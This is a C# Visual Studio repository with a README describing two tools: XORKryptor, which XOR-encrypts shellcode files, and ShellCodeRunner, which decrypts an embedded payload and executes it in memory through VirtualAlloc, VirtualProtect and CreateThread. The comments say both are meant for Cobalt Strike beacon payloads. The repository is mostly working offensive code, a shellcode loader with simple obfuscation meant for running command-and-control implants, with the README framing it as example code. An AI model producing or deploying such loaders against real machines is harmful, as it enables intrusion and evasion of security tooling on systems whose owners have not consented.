├── .gitattributes
├── .gitignore
├── README.md
├── ShellCodeRunner.sln
├── ShellCodeRunner
├── App.config
├── Program.cs
├── Properties
│ ├── AssemblyInfo.cs
│ ├── Resources.Designer.cs
│ └── Resources.resx
└── ShellCodeRunner.csproj
└── XORKryptor
├── App.config
├── Program.cs
├── Properties
└── AssemblyInfo.cs
└── XORKryptor.csproj
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 | Resources/encrypted.bin
13 |
14 | # Build results
15 | [Dd]ebug/
16 | [Dd]ebugPublic/
17 | [Rr]elease/
18 | [Rr]eleases/
19 | x64/
20 | x86/
21 | bld/
22 | [Bb]in/
23 | [Oo]bj/
24 | [Ll]og/
25 |
26 | # Visual Studio 2015 cache/options directory
27 | .vs/
28 | # Uncomment if you have tasks that create the project's static files in wwwroot
29 | #wwwroot/
30 |
31 | # MSTest test Results
32 | [Tt]est[Rr]esult*/
33 | [Bb]uild[Ll]og.*
34 |
35 | # NUNIT
36 | *.VisualState.xml
37 | TestResult.xml
38 |
39 | # Build Results of an ATL Project
40 | [Dd]ebugPS/
41 | [Rr]eleasePS/
42 | dlldata.c
43 |
44 | # DNX
45 | project.lock.json
46 | project.fragment.lock.json
47 | artifacts/
48 |
49 | *_i.c
50 | *_p.c
51 | *_i.h
52 | *.ilk
53 | *.meta
54 | *.obj
55 | *.pch
56 | *.pdb
57 | *.pgc
58 | *.pgd
59 | *.rsp
60 | *.sbr
61 | *.tlb
62 | *.tli
63 | *.tlh
64 | *.tmp
65 | *.tmp_proj
66 | *.log
67 | *.vspscc
68 | *.vssscc
69 | .builds
70 | *.pidb
71 | *.svclog
72 | *.scc
73 |
74 | # Chutzpah Test files
75 | _Chutzpah*
76 |
77 | # Visual C++ cache files
78 | ipch/
79 | *.aps
80 | *.ncb
81 | *.opendb
82 | *.opensdf
83 | *.sdf
84 | *.cachefile
85 | *.VC.db
86 | *.VC.VC.opendb
87 |
88 | # Visual Studio profiler
89 | *.psess
90 | *.vsp
91 | *.vspx
92 | *.sap
93 |
94 | # TFS 2012 Local Workspace
95 | $tf/
96 |
97 | # Guidance Automation Toolkit
98 | *.gpState
99 |
100 | # ReSharper is a .NET coding add-in
101 | _ReSharper*/
102 | *.[Rr]e[Ss]harper
103 | *.DotSettings.user
104 |
105 | # JustCode is a .NET coding add-in
106 | .JustCode
107 |
108 | # TeamCity is a build add-in
109 | _TeamCity*
110 |
111 | # DotCover is a Code Coverage Tool
112 | *.dotCover
113 |
114 | # NCrunch
115 | _NCrunch_*
116 | .*crunch*.local.xml
117 | nCrunchTemp_*
118 |
119 | # MightyMoose
120 | *.mm.*
121 | AutoTest.Net/
122 |
123 | # Web workbench (sass)
124 | .sass-cache/
125 |
126 | # Installshield output folder
127 | [Ee]xpress/
128 |
129 | # DocProject is a documentation generator add-in
130 | DocProject/buildhelp/
131 | DocProject/Help/*.HxT
132 | DocProject/Help/*.HxC
133 | DocProject/Help/*.hhc
134 | DocProject/Help/*.hhk
135 | DocProject/Help/*.hhp
136 | DocProject/Help/Html2
137 | DocProject/Help/html
138 |
139 | # Click-Once directory
140 | publish/
141 |
142 | # Publish Web Output
143 | *.[Pp]ublish.xml
144 | *.azurePubxml
145 | # TODO: Comment the next line if you want to checkin your web deploy settings
146 | # but database connection strings (with potential passwords) will be unencrypted
147 | #*.pubxml
148 | *.publishproj
149 |
150 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
151 | # checkin your Azure Web App publish settings, but sensitive information contained
152 | # in these scripts will be unencrypted
153 | PublishScripts/
154 |
155 | # NuGet Packages
156 | *.nupkg
157 | # The packages folder can be ignored because of Package Restore
158 | **/packages/*
159 | # except build/, which is used as an MSBuild target.
160 | !**/packages/build/
161 | # Uncomment if necessary however generally it will be regenerated when needed
162 | #!**/packages/repositories.config
163 | # NuGet v3's project.json files produces more ignoreable files
164 | *.nuget.props
165 | *.nuget.targets
166 |
167 | # Microsoft Azure Build Output
168 | csx/
169 | *.build.csdef
170 |
171 | # Microsoft Azure Emulator
172 | ecf/
173 | rcf/
174 |
175 | # Windows Store app package directories and files
176 | AppPackages/
177 | BundleArtifacts/
178 | Package.StoreAssociation.xml
179 | _pkginfo.txt
180 |
181 | # Visual Studio cache files
182 | # files ending in .cache can be ignored
183 | *.[Cc]ache
184 | # but keep track of directories ending in .cache
185 | !*.[Cc]ache/
186 |
187 | # Others
188 | ClientBin/
189 | ~$*
190 | *~
191 | *.dbmdl
192 | *.dbproj.schemaview
193 | *.jfm
194 | *.pfx
195 | *.publishsettings
196 | node_modules/
197 | orleans.codegen.cs
198 |
199 | # Since there are multiple workflows, uncomment next line to ignore bower_components
200 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
201 | #bower_components/
202 |
203 | # RIA/Silverlight projects
204 | Generated_Code/
205 |
206 | # Backup & report files from converting an old project file
207 | # to a newer Visual Studio version. Backup files are not needed,
208 | # because we have git ;-)
209 | _UpgradeReport_Files/
210 | Backup*/
211 | UpgradeLog*.XML
212 | UpgradeLog*.htm
213 |
214 | # SQL Server files
215 | *.mdf
216 | *.ldf
217 |
218 | # Business Intelligence projects
219 | *.rdl.data
220 | *.bim.layout
221 | *.bim_*.settings
222 |
223 | # Microsoft Fakes
224 | FakesAssemblies/
225 |
226 | # GhostDoc plugin setting file
227 | *.GhostDoc.xml
228 |
229 | # Node.js Tools for Visual Studio
230 | .ntvs_analysis.dat
231 |
232 | # Visual Studio 6 build log
233 | *.plg
234 |
235 | # Visual Studio 6 workspace options file
236 | *.opt
237 |
238 | # Visual Studio LightSwitch build output
239 | **/*.HTMLClient/GeneratedArtifacts
240 | **/*.DesktopClient/GeneratedArtifacts
241 | **/*.DesktopClient/ModelManifest.xml
242 | **/*.Server/GeneratedArtifacts
243 | **/*.Server/ModelManifest.xml
244 | _Pvt_Extensions
245 |
246 | # Paket dependency manager
247 | .paket/paket.exe
248 | paket-files/
249 |
250 | # FAKE - F# Make
251 | .fake/
252 |
253 | # JetBrains Rider
254 | .idea/
255 | *.sln.iml
256 |
257 | # CodeRush
258 | .cr/
259 |
260 | # Python Tools for Visual Studio (PTVS)
261 | __pycache__/
262 | *.pyc
263 | /ShellCodeRunner/Resources/encrypt.bin
264 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ShellCodeRunner Example Code
2 | XOR Payload Encryptor for .NET and Payload Runner with Built-in XOR Decryptor
3 | ## This is just an Example
4 | This code is an example for running shell code on a Windows system via .NET assembly. It consists of 2 projects:
5 | ##### 1. XORKryptor
6 | - XOR encryptor that can be used on any file, but was written to as an example to encrypt Cobalt Strike payloads.
7 | ##### 2. ShellCodeRunner: Executing the shellcode injection technique
8 | - Example code intended for running XOR encrypted Cobalt Strike beacon payloads. It contains a XOR decryptor which decrypts the
9 | payload before running.
10 | - Where traditional ShellCode Injection typically opens an already running process and uses CreateRemoteThread, the method in this example
11 | instead, uses CreateThread to create a new thread within the ShellCodeRunner process itself.
12 | The ShellCodeRunner executes the following steps:
13 | 1. Allocate a chunk of memory in the calling process (VirtualAlloc) with RW memory protection
14 | 2. Copy the shellcode payload to the newly allocated section (Marshal.Copy)
15 | 3. Change memory protection to RX (VirtualProtect)
16 | 4. Create a new thread in the calling process to execute the shellcode (CreateThread).
17 | 5. Wait for beacon to call to exit (WaitForSingleObject)
18 | ## Special Thanks
19 | This example code was made entirely possible by @djhohnstein
20 | He is a MOUNTAIN of knowledge and I learned a LOT!
21 |
--------------------------------------------------------------------------------
/ShellCodeRunner.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.572
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ShellCodeRunner", "ShellCodeRunner\ShellCodeRunner.csproj", "{634874B7-BF85-400C-82F0-7F3B4659549A}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "XORKryptor", "XORKryptor\XORKryptor.csproj", "{2F9C3053-077F-45F2-B207-87C3C7B8F054}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|Any CPU = Debug|Any CPU
13 | Release|Any CPU = Release|Any CPU
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {634874B7-BF85-400C-82F0-7F3B4659549A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {634874B7-BF85-400C-82F0-7F3B4659549A}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {634874B7-BF85-400C-82F0-7F3B4659549A}.Release|Any CPU.ActiveCfg = Release|Any CPU
19 | {634874B7-BF85-400C-82F0-7F3B4659549A}.Release|Any CPU.Build.0 = Release|Any CPU
20 | {2F9C3053-077F-45F2-B207-87C3C7B8F054}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
21 | {2F9C3053-077F-45F2-B207-87C3C7B8F054}.Debug|Any CPU.Build.0 = Debug|Any CPU
22 | {2F9C3053-077F-45F2-B207-87C3C7B8F054}.Release|Any CPU.ActiveCfg = Release|Any CPU
23 | {2F9C3053-077F-45F2-B207-87C3C7B8F054}.Release|Any CPU.Build.0 = Release|Any CPU
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {1619F7A3-ECAF-4CF0-85DC-9C5771ED6E8E}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/ShellCodeRunner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/ShellCodeRunner/Program.cs:
--------------------------------------------------------------------------------
1 | /*
2 | * ShellCodeRunner:
3 | * Executes the shellcode injection technique
4 | * A .NET ShellCode runner with built in XOR DECRYPTOR, intended for running XOR encrypted
5 | * Cobalt strike beacon payloads, but can be used for any XOR encrypted payload.
6 | *
7 | * By Antonio Piazza
8 | * 4n7m4n
9 | * Twitter: @antman1p
10 | *
11 | * Held by the hand/taught/mentored/instructed and written by Dwight Hohnstein
12 | * Twitter: @djhohnstein
13 | *
14 | * References:
15 | * http://pinvoke.net/default.aspx/kernel32/VirtualAllocEx.html
16 | * http://pinvoke.net/default.aspx/kernel32/VirtualProtectEx.html
17 | * http://pinvoke.net/default.aspx/kernel32/CreateThread.html
18 | * https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-virtualalloc
19 | * https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-virtualprotect
20 | * https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-createthread
21 | * https://docs.microsoft.com/en-us/windows/desktop/api/synchapi/nf-synchapi-waitforsingleobject
22 | * https://docs.microsoft.com/en-us/windows/desktop/memory/memory-protection-constants
23 | * https://msdn.microsoft.com/en-us/library/windows/desktop/aa379560(v=vs.85).aspx
24 | * https://www.endgame.com/blog/technical-blog/hunting-memory
25 | * https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
26 | *
27 | */
28 |
29 | using System;
30 | using System.Runtime.InteropServices;
31 |
32 | namespace ShellCodeRunner
33 | {
34 | class Program
35 | {
36 | static byte[] GetAllDecryptedBytes()
37 | {
38 | //Decryption Key. Ensure it is the same as your Encryption key
39 | char[] key = { 'p', 'a', 's', 's', 'k', 'e', 'y' };
40 |
41 | /* Get the encrypted payload from the embedded resource
42 | * You'll need to add the XOR encrypted payload (encrypt.bin)
43 | * to Visual Studio as an embedded resource
44 | * https://stackoverflow.com/questions/39367349/code-or-command-to-use-embedded-resource-in-visual-studio
45 | */
46 | byte[] encBytes = ShellCodeRunner.Properties.Resources.encrypt;
47 |
48 | // New byte array to hold decrypet payload bytes
49 | byte[] newByte = new byte[encBytes.Length];
50 |
51 | // index for the decryption key
52 | int j = 0;
53 |
54 | // Loop through each byte of the encrypted payload
55 | for (int i = 0; i < encBytes.Length; i++)
56 | {
57 | // iterate through the bytes of the encryption key. If at the end of the array, loop back to the begining
58 | if (j == key.Length)
59 | {
60 | j = 0;
61 | }
62 | // XOR each byte of the encrypted payload with the coresponding byte of the encryption key
63 | newByte[i] = (byte)(encBytes[i] ^ Convert.ToByte(key[j]));
64 | j++;
65 | }
66 | return newByte;
67 | }
68 |
69 | static void Main(string[] args)
70 | {
71 | // Get decrypted pic
72 | byte[] pic = GetAllDecryptedBytes();
73 |
74 | // Allocate space for it
75 | IntPtr segment = VirtualAlloc(
76 | IntPtr.Zero,
77 | // Length of the decrypted payload
78 | (uint)pic.Length,
79 | AllocationType.Commit,
80 | //Allocate as RW
81 | MemoryProtection.ReadWrite);
82 |
83 | // Copy over pic to segment
84 | Marshal.Copy(pic, 0, segment, pic.Length);
85 |
86 | // Reprotect segment to make it executable
87 | MemoryProtection oldProtect = new MemoryProtection();
88 | bool rxSuccess = VirtualProtect(segment, (uint)pic.Length, MemoryProtection.ExecuteRead, out oldProtect);
89 |
90 | // Prepare variables for CreateThread
91 | IntPtr threadId = IntPtr.Zero;
92 | SECURITY_ATTRIBUTES attrs = new SECURITY_ATTRIBUTES();
93 |
94 | // Create the thread
95 | IntPtr hThread = CreateThread(attrs, 0, segment, IntPtr.Zero, CreationFlags.IMMEDIATE, out threadId);
96 |
97 | // Wait for its execution to finish, which is until beacon calls exit.
98 | WaitForSingleObject(hThread, 0xFFFFFFFF);
99 | }
100 |
101 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
102 | static extern IntPtr VirtualAlloc(IntPtr lpAddress,
103 | uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
104 |
105 | [DllImport("kernel32.dll")]
106 | static extern bool VirtualProtect(IntPtr lpAddress,
107 | uint dwSize, MemoryProtection flNewProtect, out MemoryProtection lpflOldProtect);
108 |
109 | [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
110 | private unsafe static extern IntPtr CreateThread(
111 | SECURITY_ATTRIBUTES lpThreadAttributes,
112 | int dwStackSize,
113 | IntPtr lpStartAddress,
114 | IntPtr lpParameter,
115 | CreationFlags dwCreationFlags,
116 | out IntPtr lpThreadId);
117 |
118 | [DllImport("kernel32.dll", SetLastError = true)]
119 | static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
120 |
121 |
122 | [StructLayout(LayoutKind.Sequential)]
123 | public struct SECURITY_ATTRIBUTES
124 | {
125 | public int nLength;
126 | public unsafe byte* lpSecurityDescriptor;
127 | public int bInheritHandle;
128 | }
129 |
130 | [Flags]
131 | public enum AllocationType
132 | {
133 | Commit = 0x1000,
134 | Reserve = 0x2000,
135 | Decommit = 0x4000,
136 | Release = 0x8000,
137 | Reset = 0x80000,
138 | Physical = 0x400000,
139 | TopDown = 0x100000,
140 | WriteWatch = 0x200000,
141 | LargePages = 0x20000000
142 | }
143 |
144 | [Flags]
145 | public enum MemoryProtection
146 | {
147 | Execute = 0x10,
148 | ExecuteRead = 0x20,
149 | ExecuteReadWrite = 0x40,
150 | ExecuteWriteCopy = 0x80,
151 | NoAccess = 0x01,
152 | ReadOnly = 0x02,
153 | ReadWrite = 0x04,
154 | WriteCopy = 0x08,
155 | GuardModifierflag = 0x100,
156 | NoCacheModifierflag = 0x200,
157 | WriteCombineModifierflag = 0x400
158 | }
159 |
160 | [Flags]
161 | public enum CreationFlags
162 | {
163 | IMMEDIATE = 0,
164 | CREATE_SUSPENDED = 0x00000004,
165 | STACK_SIZE_PARAM_IS_A_RESERVATION = 0x00010000
166 | }
167 | }
168 | }
169 |
--------------------------------------------------------------------------------
/ShellCodeRunner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ShellCodeRunner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellCodeRunner")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("634874b7-bf85-400c-82f0-7f3b4659549a")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ShellCodeRunner/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace ShellCodeRunner.Properties {
12 | using System;
13 |
14 |
15 | ///
16 | /// A strongly-typed resource class, for looking up localized strings, etc.
17 | ///
18 | // This class was auto-generated by the StronglyTypedResourceBuilder
19 | // class via a tool like ResGen or Visual Studio.
20 | // To add or remove a member, edit your .ResX file then rerun ResGen
21 | // with the /str option, or rebuild your VS project.
22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0")]
23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 | internal class Resources {
26 |
27 | private static global::System.Resources.ResourceManager resourceMan;
28 |
29 | private static global::System.Globalization.CultureInfo resourceCulture;
30 |
31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 | internal Resources() {
33 | }
34 |
35 | ///
36 | /// Returns the cached ResourceManager instance used by this class.
37 | ///
38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
39 | internal static global::System.Resources.ResourceManager ResourceManager {
40 | get {
41 | if (object.ReferenceEquals(resourceMan, null)) {
42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("ShellCodeRunner.Properties.Resources", typeof(Resources).Assembly);
43 | resourceMan = temp;
44 | }
45 | return resourceMan;
46 | }
47 | }
48 |
49 | ///
50 | /// Overrides the current thread's CurrentUICulture property for all
51 | /// resource lookups using this strongly typed resource class.
52 | ///
53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
54 | internal static global::System.Globalization.CultureInfo Culture {
55 | get {
56 | return resourceCulture;
57 | }
58 | set {
59 | resourceCulture = value;
60 | }
61 | }
62 |
63 | ///
64 | /// Looks up a localized resource of type System.Byte[].
65 | ///
66 | internal static byte[] encrypt {
67 | get {
68 | object obj = ResourceManager.GetObject("encrypt", resourceCulture);
69 | return ((byte[])(obj));
70 | }
71 | }
72 | }
73 | }
74 |
--------------------------------------------------------------------------------
/ShellCodeRunner/Properties/Resources.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 |
122 | ..\Resources\encrypt.bin;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
123 |
124 |
--------------------------------------------------------------------------------
/ShellCodeRunner/ShellCodeRunner.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {634874B7-BF85-400C-82F0-7F3B4659549A}
8 | Exe
9 | Properties
10 | ShellCodeRunner
11 | ShellCodeRunner
12 | v4.0
13 | 512
14 | true
15 |
16 |
17 |
18 | AnyCPU
19 | true
20 | full
21 | false
22 | bin\Debug\
23 | DEBUG;TRACE
24 | prompt
25 | 4
26 | true
27 |
28 |
29 | AnyCPU
30 | pdbonly
31 | true
32 | bin\Release\
33 | TRACE
34 | prompt
35 | 4
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 | True
52 | True
53 | Resources.resx
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 | ResXFileCodeGenerator
63 | Resources.Designer.cs
64 |
65 |
66 |
67 |
68 |
75 |
--------------------------------------------------------------------------------
/XORKryptor/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/XORKryptor/Program.cs:
--------------------------------------------------------------------------------
1 | /*
2 | * XORKryptor
3 | * A .NET XOR encryption tool, intended to encrypt Cobalt strike beacon payloads,
4 | * but can be used on any file.
5 | *
6 | * By Antonio Piazza
7 | * 4n7m4n
8 | * Twitter: @antman1p
9 | *
10 | * Held by the hand and taught/mentored/instructed by Dwight Hohnstein
11 | * Twitter: @djhohnstein
12 | *
13 | */
14 |
15 | using System;
16 | using System.IO;
17 |
18 | namespace ShellCodeRunner
19 | {
20 | class Program
21 | {
22 | static void Main(string[] args)
23 | {
24 | if (args.Length != 1)
25 | {
26 | Console.WriteLine("ERROR: Pass only the path to the shell code file to encrypt");
27 | Environment.Exit(1);
28 | }
29 | if (!File.Exists(args[0]))
30 | {
31 | Console.WriteLine("Could not find the shellcode bin file: {0}", args[0]);
32 | Environment.Exit(1);
33 | }
34 | // Call function wiht command line argument which is the unencrypted beacon payload path if arguments pass checks
35 | getPayLoad(args[0]);
36 | }
37 |
38 | static void getPayLoad(string bcnPath)
39 | {
40 | // Read the bytes from the unencrypted beacon payload file to a byte array
41 | byte[] uncShell = File.ReadAllBytes(bcnPath);
42 |
43 | // Encryption key. Change this to whatever you want
44 | char[] arryKey = { 'p', 'a', 's', 's', 'k', 'e', 'y' };
45 |
46 | // Call the XOR encryption function on the payload with the encryption key
47 | byte [] payLoad = encrypt(uncShell, arryKey);
48 |
49 | // Write the encrypted payload out to a file
50 | File.WriteAllBytes("encrypt.bin", payLoad);
51 | Console.WriteLine("Shellcode has been encrypted.");
52 | }
53 |
54 | static byte[] encrypt(byte[] shellCode, char[] key)
55 | {
56 | // Initialize a new byte array the size of the unencrypted shellcode
57 | byte[] newByte = new byte[shellCode.Length];
58 |
59 | // Encryption key index
60 | int j = 0;
61 |
62 | // iterate through each byte of the unecncrypted shellcode
63 | for (int i = 0; i < shellCode.Length; i++)
64 | {
65 | // iterate through the bytes of the encryption key. If at the end of the array, loop back to the begining
66 | if (j == key.Length)
67 | {
68 | j = 0;
69 | }
70 |
71 | // XOR each byte of the unencrypted payload with the coresponding byte of the encryption key
72 | newByte[i] = (byte)(shellCode[i] ^ Convert.ToByte(key[j]));
73 | j++;
74 | }
75 | return newByte;
76 | }
77 | }
78 | }
79 |
--------------------------------------------------------------------------------
/XORKryptor/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("XORKryptor")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("XORKryptor")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("2f9c3053-077f-45f2-b207-87c3c7b8f054")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/XORKryptor/XORKryptor.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {2F9C3053-077F-45F2-B207-87C3C7B8F054}
8 | Exe
9 | Properties
10 | ShellCodeRunner
11 | ShellCodeRunner
12 | v4.0
13 | 512
14 | true
15 |
16 | publish\
17 | true
18 | Disk
19 | false
20 | Foreground
21 | 7
22 | Days
23 | false
24 | false
25 | true
26 | 0
27 | 1.0.0.%2a
28 | false
29 | false
30 | true
31 |
32 |
33 | AnyCPU
34 | true
35 | full
36 | false
37 | bin\Debug\
38 | DEBUG;TRACE
39 | prompt
40 | 4
41 | true
42 |
43 |
44 | AnyCPU
45 | pdbonly
46 | true
47 | bin\Release\
48 | TRACE
49 | prompt
50 | 4
51 | true
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 | False
73 | .NET Framework 3.5 SP1
74 | false
75 |
76 |
77 |
78 |
85 |
--------------------------------------------------------------------------------